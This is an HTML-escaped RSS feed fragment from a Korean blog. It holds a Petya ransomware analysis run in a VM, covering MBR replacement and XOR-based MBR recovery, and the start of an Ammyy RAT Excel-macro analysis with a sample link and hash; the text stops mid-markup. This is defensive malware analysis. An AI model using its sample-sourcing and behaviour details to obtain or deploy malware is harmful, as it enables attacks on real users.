&lt;figure id=&quot;og_1586611155674&quot; contenteditable=&quot;false&quot; data-ke-type=&quot;opengraph&quot; data-og-type=&quot;article&quot; data-og-title=&quot;[악성코드분석] Petya 랜섬웨어 분석 - #1 개요&quot; data-og-description=&quot;먼저 필자의 환경은 다음과 같습니다. Real Machine Virtual Machine Windows 10 Pro x64 Windows 7 x64 먼저 가상컴퓨터에 Petya 랜섬웨어 샘플을 받아 줬습니다. 샘플의 경우 Github에서 손쉽게 구하실 수 있습..&quot; data-og-host=&quot;blog.system32.kr&quot; data-og-source-url=&quot;https://blog.system32.kr/178&quot; data-og-url=&quot;https://blog.system32.kr/178&quot; data-og-image=&quot;https://scrap.kakaocdn.net/dn/bRchAi/hyFDBycW6Y/uxjjqPEdeHvawnl6tXK4h0/img.png?width=800&amp;amp;height=426&amp;amp;face=0_0_800_426,https://scrap.kakaocdn.net/dn/c819RE/hyFDl9YiKg/OBcZASbxNmQanqBx3IQlsk/img.png?width=800&amp;amp;height=426&amp;amp;face=0_0_800_426,https://scrap.kakaocdn.net/dn/bAZLpd/hyFDrvzzhx/uplP9SMzeLt9aAK45ZwHhk/img.png?width=1366&amp;amp;height=728&amp;amp;face=0_0_1366_728&quot;&gt;&lt;a href=&quot;https://blog.system32.kr/178&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot; data-source-url=&quot;https://blog.system32.kr/178&quot;&gt;
&lt;div class=&quot;og-image&quot; style=&quot;background-image: url('https://scrap.kakaocdn.net/dn/bRchAi/hyFDBycW6Y/uxjjqPEdeHvawnl6tXK4h0/img.png?width=800&amp;amp;height=426&amp;amp;face=0_0_800_426,https://scrap.kakaocdn.net/dn/c819RE/hyFDl9YiKg/OBcZASbxNmQanqBx3IQlsk/img.png?width=800&amp;amp;height=426&amp;amp;face=0_0_800_426,https://scrap.kakaocdn.net/dn/bAZLpd/hyFDrvzzhx/uplP9SMzeLt9aAK45ZwHhk/img.png?width=1366&amp;amp;height=728&amp;amp;face=0_0_1366_728');&quot;&gt;&amp;nbsp;&lt;/div&gt;
&lt;div class=&quot;og-text&quot;&gt;
&lt;p class=&quot;og-title&quot;&gt;[악성코드분석] Petya 랜섬웨어 분석 - #1 개요&lt;/p&gt;
&lt;p class=&quot;og-desc&quot;&gt;먼저 필자의 환경은 다음과 같습니다. Real Machine Virtual Machine Windows 10 Pro x64 Windows 7 x64 먼저 가상컴퓨터에 Petya 랜섬웨어 샘플을 받아 줬습니다. 샘플의 경우 Github에서 손쉽게 구하실 수 있습..&lt;/p&gt;
&lt;p class=&quot;og-host&quot;&gt;blog.system32.kr&lt;/p&gt;
&lt;/div&gt;
&lt;/a&gt;&lt;/figure&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style5&quot; /&gt;
&lt;p&gt;먼저 필자의 환경은 다음과 같습니다.&lt;/p&gt;
&lt;table style=&quot;border-collapse: collapse; width: 100%;&quot; border=&quot;1&quot;&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Real Machine&lt;/td&gt;
&lt;td&gt;Virtual Machine&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;span style=&quot;color: #333333;&quot;&gt;Windows 10 Pro x64&lt;/span&gt;&lt;/td&gt;
&lt;td&gt;Windows 7 x64&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;먼저 가상컴퓨터에 Petya 랜섬웨어 샘플을 받아 줬습니다. 샘플의 경우 Github에서 손쉽게 구하실 수 있습니다.&lt;/p&gt;
&lt;p&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;압축을 풀고 실행을 해서 어떻게 작동을 하는지 확인해보도록 하겠습니다. (스냅숏은 필수입니다!)&lt;/p&gt;
&lt;p&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;Petya 랜섬웨어를 실행을 시켜 보았습니다.&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;amp;amp;fname=https%3A%2F%2Fk.kakaocdn.net%2Fdn%2FbL7pdJ%2FbtqDmVm02gX%2FsAesHg04tNUfCi96Nvv4w1%2Fimg.png&quot; data-origin-width=&quot;0&quot; data-origin-height=&quot;0&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bMNKa6/btqDmVm1MvG/7nrJlmKLge6CGKbGQe4m4k/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bMNKa6/btqDmVm1MvG/7nrJlmKLge6CGKbGQe4m4k/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bMNKa6/btqDmVm1MvG/7nrJlmKLge6CGKbGQe4m4k/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;amp;fname=https%3A%2F%2Fk.kakaocdn.net%2Fdn%2FbL7pdJ%2FbtqDmVm02gX%2FsAesHg04tNUfCi96Nvv4w1%2Fimg.png&quot; data-origin-width=&quot;0&quot; data-origin-height=&quot;0&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p&gt;Petya 랜섬웨어가 정상적으로 작동이 되었습니다. 아무키나 눌르라고 하니 아무키나 눌러보도록 하겠습니다.&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;amp;amp;fname=https%3A%2F%2Fk.kakaocdn.net%2Fdn%2FBkUml%2FbtqDnxMXCvy%2FWYsJp0cD7vel0kytGCbVoK%2Fimg.png&quot; data-origin-width=&quot;0&quot; data-origin-height=&quot;0&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bccP7t/btqDliwr0I0/nVvbvoDvmkDuIwjai113B0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bccP7t/btqDliwr0I0/nVvbvoDvmkDuIwjai113B0/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bccP7t/btqDliwr0I0/nVvbvoDvmkDuIwjai113B0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;amp;fname=https%3A%2F%2Fk.kakaocdn.net%2Fdn%2FBkUml%2FbtqDnxMXCvy%2FWYsJp0cD7vel0kytGCbVoK%2Fimg.png&quot; data-origin-width=&quot;0&quot; data-origin-height=&quot;0&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p&gt;대략 돈을 아래의 주소로 보내라고 합니다. 이런건 무시하고 분석을 시작하도록 하겠습니다.&lt;/p&gt;
&lt;hr style=&quot;padding: 0px; margin: 33px -10px 20px; word-break: keep-all; overflow-wrap: break-word; -webkit-font-smoothing: antialiased; border: none; font-size: 0px; line-height: 0; height: 20px; background: url('//cdn.jsdelivr.net/gh/kaniwari/space@11.4.1r10/img/webobject_divline_night.svg') 0px -120px / 200px 200px #000000; cursor: default !important; clear: both; color: #bbbbbb; font-family: 'Source Han Sans (Modified)', -apple-system, 'SF Pro Text', 'SF UI Text', 'Segoe UI Emoji', 'Segoe UI', Roboto, Meiryo, 'Microsoft YaHei UI', 'Apple SD Gothic Neo', 'Malgun Gothic', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;&quot; contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style5&quot; /&gt;
&lt;p&gt;먼저 Petya 랜섬웨어의 경우 전형적인 MBR Locker로서 정상 MBR을 악성 MBR로 교체해서 부팅이 되지 않도록 합니다.&lt;/p&gt;
&lt;p&gt;샘플 랜섬웨어가 실행된 후의 MBR의 모식도는 아래와 같습니다.&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;amp;amp;fname=https%3A%2F%2Fk.kakaocdn.net%2Fdn%2FcCc4uW%2FbtqDogYhL0s%2FqXAOt0leqTHNIkDad5D7R0%2Fimg.png&quot; data-origin-width=&quot;0&quot; data-origin-height=&quot;0&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/7WH8y/btqDmV8nfUD/bDmCp3dQLzCYFEgKxXOelK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/7WH8y/btqDmV8nfUD/bDmCp3dQLzCYFEgKxXOelK/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/7WH8y/btqDmV8nfUD/bDmCp3dQLzCYFEgKxXOelK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;amp;fname=https%3A%2F%2Fk.kakaocdn.net%2Fdn%2FcCc4uW%2FbtqDogYhL0s%2FqXAOt0leqTHNIkDad5D7R0%2Fimg.png&quot; data-origin-width=&quot;0&quot; data-origin-height=&quot;0&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p&gt;원본 MBR의 내용이 사라지는 것이 아닌, 암호화되어서 0x7200 부분에 존재하고 있습니다. XOR 0x37 연산을 통해서 다시 원본 MBR로 복구가 가능합니다.&lt;/p&gt;
&lt;p&gt;하지만 Petya의 경우 MBR만 조작할뿐, 파일의 암호화는 시키지 않고 있기때문에, 파일의 경우 다른 컴퓨터에 연결 또는, 도킹 스테이션, 등등의 방법으로 연결해서 파일을 추출할 수 있습니다.&lt;/p&gt;
&lt;p&gt;하지만 이러한 MBR Locker가 진화하여서 파일까지 암호화 할 경우, 더욱 피해가 커질거라고 생각합니다.&lt;/p&gt;
&lt;hr style=&quot;padding: 0px; margin: 33px -10px 20px; word-break: keep-all; overflow-wrap: break-word; -webkit-font-smoothing: antialiased; border: none; font-size: 0px; line-height: 0; height: 20px; background: url('//cdn.jsdelivr.net/gh/kaniwari/space@11.4.1r10/img/webobject_divline_night.svg') 0px -120px / 200px 200px #000000; cursor: default !important; clear: both; color: #bbbbbb; font-family: 'Source Han Sans (Modified)', -apple-system, 'SF Pro Text', 'SF UI Text', 'Segoe UI Emoji', 'Segoe UI', Roboto, Meiryo, 'Microsoft YaHei UI', 'Apple SD Gothic Neo', 'Malgun Gothic', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;&quot; contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style5&quot; /&gt;
&lt;p&gt;분석은 2편에서 찾아뵙도록 하겠습니다. 감사합니다.&lt;/p&gt;
&lt;p&gt;&amp;nbsp;&lt;/p&gt;</description>
      <author>Forensics</author>
      <guid isPermaLink="true">https://rgb4.tistory.com/21</guid>
      <comments>https://rgb4.tistory.com/21#entry21comment</comments>
      <pubDate>Sat, 11 Apr 2020 22:19:47 +0900</pubDate>
    </item>
    <item>
      <title>[악성 파일 분석] 엑셀 매크로 파일 분석 - Ammyy RAT</title>
      <link>https://rgb4.tistory.com/4</link>
      <description>&lt;p&gt;&lt;span&gt;Sample Path : &lt;/span&gt;&lt;span&gt;&lt;/span&gt;&lt;a href=&quot;http://malware-traffic-analysis.net/2019/03/06/index.html&quot;&gt;http://malware-traffic-analysis.net/2019/03/06/index.html&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;SHA-256 : &lt;span&gt;d65ce03cc8e888c94c5dcb797630db33fb01fbf166b38db09744c115f20150b7&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&amp;nbsp;&lt;/p&gt;
&lt;h4 data-ke-size=&quot;size20&quot;&gt;&lt;span style=&quot;color: #ef5369;&quot;&gt;&lt;b&gt;1. 개요&lt;/b&gt;&lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span&gt;해당&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;악성&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;파일은&lt;/span&gt;&lt;span&gt; 2019&lt;/span&gt;&lt;span&gt;년&lt;/span&gt;&lt;span&gt; 5&lt;/span&gt;&lt;span&gt;월&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;국내&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;기업을&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;대상으로 한&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;피싱&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;메일로&lt;/span&gt;&lt;span&gt; '.xls' &lt;/span&gt;&lt;span&gt;파일을&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;첨부한&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;형태로&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;전파되는&lt;/span&gt;&lt;span&gt; APT &lt;/span&gt;&lt;span&gt;공격입니다&lt;/span&gt;&lt;span&gt;. &lt;/span&gt;&lt;span&gt;불과&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;얼마&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;전만&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;해도&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;랜섬웨어의&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;비율이&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;높았으나&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;근래에는&lt;/span&gt;&lt;span&gt; RAT(Remote Accress Trojan)&lt;/span&gt;&lt;span&gt;을&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;유포하는&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;공격 방식이&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;활발해졌다고&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;합니다&lt;/span&gt;&lt;span&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;span&gt;RAT&lt;/span&gt;&lt;span&gt;란&lt;/span&gt;&lt;span&gt;?&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span&gt;원격 관리 도구&lt;/span&gt;&lt;span&gt;(RAT&amp;nbsp;: remote administration tool)는 원격 조정자로 하여금 해당 시스템에 물리적으로 접근권이 있는 것처럼 시스템을 제어하게 해주는 소프트웨어 및 프로그래밍 모음입니다&lt;/span&gt;&lt;span&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&amp;nbsp;&lt;/p&gt;
&lt;h4 data-ke-size=&quot;size20&quot;&gt;&lt;span style=&quot;color: #ef5369;&quot;&gt;&lt;b&gt;2. 공격자 정보&lt;/b&gt;&lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span&gt;2014&lt;/span&gt;&lt;span&gt;년&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;이후&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;많은&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;대규모&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;악성&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;스팸&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;캠페인이&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;보인&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;러시아&lt;/span&gt;&lt;span&gt; TA505 &lt;/span&gt;&lt;span&gt;조직이&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;유포한&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;악성코드로&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;추정됩니다&lt;/span&gt;&lt;span&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&amp;nbsp;&lt;/p&gt;
&lt;h4 data-ke-size=&quot;size20&quot;&gt;&lt;span style=&quot;color: #ef5369;&quot;&gt;&lt;b&gt;3. 유포된&amp;nbsp;형태&lt;/b&gt;&lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span&gt;해당&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;악성파일의&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;경우에는&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;국내&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;기업을&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;대상으로 한&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;공격으로&lt;/span&gt;&lt;span&gt; '.xls' &lt;/span&gt;&lt;span&gt;형식의&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;파일이&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;첨부되어&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;아래&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;그림과&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;같이&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;한글로&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;메일이&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;전송되었습니다&lt;/span&gt;&lt;span&gt;. &lt;/span&gt;&lt;span&gt;먼저&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;발신지&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;메일&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;주소&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;형태가&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;의심스러우며&lt;/span&gt;&lt;span&gt;, &lt;/span&gt;&lt;span&gt;첨부파일&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;열람&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;시&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;매크로&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;활성화&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;여부를&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;묻는&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;것으로&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;보아&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;악성&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;매크로가&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;내장되어&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;있는&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;것을&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;예상할&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;수&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;있습니다&lt;/span&gt;&lt;span&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-filename=&quot;1.png&quot; data-origin-width=&quot;854&quot; data-origin-height=&quot;798&quot; width=&quot;600&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/Dvu4H/btqDfCP4PQo/JEdIu5cuGoTeKrkGWzhFT0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/Dvu4H/btqDfCP4PQo/JEdIu5cuGoTeKrkGWzhFT0/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/Dvu4H/btqDfCP4PQo/JEdIu5cuGoTeKrkGWzhFT0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FDvu4H%2FbtqDfCP4PQo%2FJEdIu5cuGoTeKrkGWzhFT0%2Fimg.png&quot; data-filename=&quot;1.png&quot; data-origin-width=&quot;854&quot; data-origin-height=&quot;798&quot; width=&quot;600&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;figure class=&quot;imageblock alignCenter&quot; data-filename=&quot;3.png&quot; data-origin-width=&quot;1242&quot; data-origin-height=&quot;609&quot; width=&quot;750&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/wecWf/btqDjeNw2tx/DBeKMk0yzMWt4XSVBXUqKK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/wecWf/btqDjeNw2tx/DBeKMk0yzMWt4XSVBXUqKK/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/wecWf/btqDjeNw2tx/DBeKMk0yzMWt4XSVBXUqKK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FwecWf%2FbtqDjeNw2tx%2FDBeKMk0yzMWt4XSVBXUqKK%2Fimg.png&quot; data-filename=&quot;3.png&quot; data-origin-width=&quot;1242&quot; data-origin-height=&quot;609&quot; width=&quot;750&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;h4 data-ke-size=&quot;size20&quot;&gt;&amp;nbsp;&lt;/h4&gt;
&lt;h4 data-ke-size=&quot;size20&quot;&gt;&lt;span style=&quot;color: #ef5369;&quot;&gt;&lt;b&gt;4. 분석 과정&lt;/b&gt;&lt;/span&gt;&lt;/h4&gt;
&lt;p style=&quot;font-size: 1.12em;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;&lt;span&gt;4.1 &lt;/span&gt;&lt;span&gt;매크로&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;/b&gt;&lt;span&gt;&lt;b&gt;분석&lt;/b&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style=&quot;color: #333333;&quot;&gt;파일&lt;/span&gt;&lt;span style=&quot;color: #333333;&quot;&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;color: #333333;&quot;&gt;열람&lt;/span&gt;&lt;span style=&quot;color: #333333;&quot;&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;color: #333333;&quot;&gt;시&lt;/span&gt;&lt;span style=&quot;color: #333333;&quot;&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;Excel&lt;/span&gt;&lt;span style=&quot;color: #333333;&quot;&gt;의&lt;/span&gt;&lt;span style=&quot;color: #333333;&quot;&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;color: #333333;&quot;&gt;매크로&lt;/span&gt;&lt;span style=&quot;color: #333333;&quot;&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;color: #333333;&quot;&gt;허용&lt;/span&gt;&lt;span style=&quot;color: #333333;&quot;&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;color: #333333;&quot;&gt;여부를&lt;/span&gt;&lt;span style=&quot;color: #333333;&quot;&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;color: #333333;&quot;&gt;묻습니다&lt;/span&gt;&lt;span style=&quot;color: #333333;&quot;&gt;.&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;color: #333333;&quot;&gt;이를&lt;/span&gt;&lt;span style=&quot;color: #333333;&quot;&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;color: #333333;&quot;&gt;보아&lt;/span&gt;&lt;span style=&quot;color: #333333;&quot;&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;color: #333333;&quot;&gt;해당&lt;/span&gt;&lt;span style=&quot;color: #333333;&quot;&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;color: #333333;&quot;&gt;악성&lt;/span&gt;&lt;span style=&quot;color: #333333;&quot;&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;color: #333333;&quot;&gt;파일이&lt;/span&gt;&lt;span style=&quot;color: #333333;&quot;&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;color: #333333;&quot;&gt;매크로&lt;/span&gt;&lt;span style=&quot;color: #333333;&quot;&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;color: #333333;&quot;&gt;사용을&lt;/span&gt;&lt;span style=&quot;color: #333333;&quot;&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;color: #333333;&quot;&gt;사용자에게&lt;/span&gt;&lt;span style=&quot;color: #333333;&quot;&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;color: #333333;&quot;&gt;유도하고&lt;/span&gt;&lt;span style=&quot;color: #333333;&quot;&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;color: #333333;&quot;&gt;있습니다&lt;/span&gt;&lt;span style=&quot;color: #333333;&quot;&gt;. '&lt;/span&gt;&lt;span style=&quot;color: #333333;&quot;&gt;콘텐츠&lt;/span&gt;&lt;span style=&quot;color: #333333;&quot;&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;color: #333333;&quot;&gt;사용&lt;/span&gt;&lt;span style=&quot;color: #333333;&quot;&gt;'&lt;/span&gt;&lt;span style=&quot;color: #333333;&quot;&gt;을&lt;/span&gt;&lt;span style=&quot;color: #333333;&quot;&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;color: #333333;&quot;&gt;선택하게&lt;/span&gt;&lt;span style=&quot;color: #333333;&quot;&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;color: #333333;&quot;&gt;되면&lt;/span&gt;&lt;span style=&quot;color: #333333;&quot;&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;color: #333333;&quot;&gt;악성&lt;/span&gt;&lt;span style=&quot;color: #333333;&quot;&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;color: #333333;&quot;&gt;매크로가&lt;/span&gt;&lt;span style=&quot;color: #333333;&quot;&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;color: #333333;&quot;&gt;동작하게&lt;/span&gt;&lt;span style=&quot;color: #333333;&quot;&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;color: #333333;&quot;&gt;될&lt;/span&gt;&lt;span style=&quot;color: #333333;&quot;&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;color: #333333;&quot;&gt;것을&lt;/span&gt;&lt;span style=&quot;color: #333333;&quot;&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;color: #333333;&quot;&gt;유추할&lt;/span&gt;&lt;span style=&quot;color: 